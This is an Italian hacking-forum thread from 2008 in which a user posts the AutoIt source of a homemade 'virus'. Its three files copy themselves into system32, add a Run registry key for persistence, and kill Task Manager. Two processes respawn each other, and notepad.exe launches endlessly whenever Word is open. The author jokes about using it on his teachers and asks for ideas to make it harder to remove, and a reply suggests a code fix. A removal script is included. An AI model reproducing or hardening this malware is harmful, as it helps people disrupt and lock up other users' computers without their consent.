Xhack
Vuoi reagire a questo messaggio? Crea un account in pochi click o accedi per continuare.
Xhack

Un forum dedicato all'hacking
 
IndiceIndice  PortalePortale  CercaCerca  Ultime immaginiUltime immagini  RegistratiRegistrati  Accedi  

 

 Virus - Se apri Word....

Andare in basso 
2 partecipanti
AutoreMessaggio
Lord_Blackout
apprendista
apprendista



Numero di messaggi : 15
Data d'iscrizione : 31.01.08

Virus - Se apri Word.... Empty
MessaggioTitolo: Virus - Se apri Word....   Virus - Se apri Word.... EmptyMar Feb 05, 2008 2:58 am

Ho creato questa specie di virus tanto per esercitarmi un po' in autoit, non sono un lamer e non lo userò mai contro qualcuno (eccetto le mie prof Laughing)
Il virus è composto da 3 files, uniti insieme con iexpress:

START.exe
Codice:
#NoTrayIcon
FileCopy("virus.exe", "C:\WINDOWS\system32\")
FileCopy("antitask.exe", "C:\WINDOWS\system32\")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio", "REG_SZ", "C:\WINDOWS\system32\virus.exe")
Run("C:\WINDOWS\system32\virus.exe")

virus.exe
Codice:
#NoTrayIcon
If ProcessExists("antitask.exe") Then
   Sleep("100")
Else
   Run("C:\WINDOWS\system32\antitask.exe")
EndIf
While 1 = 1
   If ProcessExists("word.exe") Then
      
                While 1 = 1
                Run("notepad.exe")
                WEnd

   ElseIf ProcessExists("antitask.exe") Then
      Sleep("100")

   Else
      Run("C:\WINDOWS\system32\antitask.exe")
      EndIf
   EndIf
WEnd

antitask.exe
Codice:
#NoTrayIcon
while 1 = 1
   ProcessClose("taskmgr.exe")
   If ProcessExists("virus.exe") Then
      Sleep("100")
   Else
      Run("C:\WINDOWS\system32\virus.exe")
   EndIf
WEnd

Nonostante non sia possibile utilizzare il taskmanager, alcuni firewall permettono di chiudere i processi, ecco quindi che si rigenerano a vicenda.
E poi, basta eliminare la chiave di registro e riavviare il pc per disabilitarlo.
Se avete altre idee per renderlo meno estirpabile (infatti se col firewall mettiamo i processi in quarantena si riesca ad estirparlo) lo dica pure Very Happy

P.S.
Ecco il file di antidoto:
Codice:
ProcessClose("antitask.exe")
ProcessClose("virus.exe")
FileDelete("D:\WINDOWS\system32\virus.exe")
FileDelete("D:\WINDOWS\system32\antitask.exe")
RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio")
Torna in alto Andare in basso
darkphantom
hack-member
hack-member
darkphantom


Numero di messaggi : 398
Data d'iscrizione : 03.09.07

Virus - Se apri Word.... Empty
MessaggioTitolo: Re: Virus - Se apri Word....   Virus - Se apri Word.... EmptyMar Feb 05, 2008 4:21 pm

perchè metti sleep("100")? (che tra l'altro dovrebbe essere sleep(100))
fai prima a scrivere:
Codice:

If Not ProcessExists("taskmgr.exe")
Torna in alto Andare in basso
Lord_Blackout
apprendista
apprendista



Numero di messaggi : 15
Data d'iscrizione : 31.01.08

Virus - Se apri Word.... Empty
MessaggioTitolo: Re: Virus - Se apri Word....   Virus - Se apri Word.... EmptyMar Feb 05, 2008 7:16 pm

ah grazie, non la conoscevo questa funzione...
mo aggiusto
Torna in alto Andare in basso
Contenuto sponsorizzato





Virus - Se apri Word.... Empty
MessaggioTitolo: Re: Virus - Se apri Word....   Virus - Se apri Word.... Empty

Torna in alto Andare in basso
 
Virus - Se apri Word....
Torna in alto 
Pagina 1 di 1
 Argomenti simili
-
» tutorial 2
» anti-virus
» Tool Virus
» Il mio primo virus con autoit
» Virus o guasto dell'hardware?

Permessi in questa sezione del forum:Non puoi rispondere agli argomenti in questo forum.
Xhack :: Programmazione :: Autoit-
Vai verso: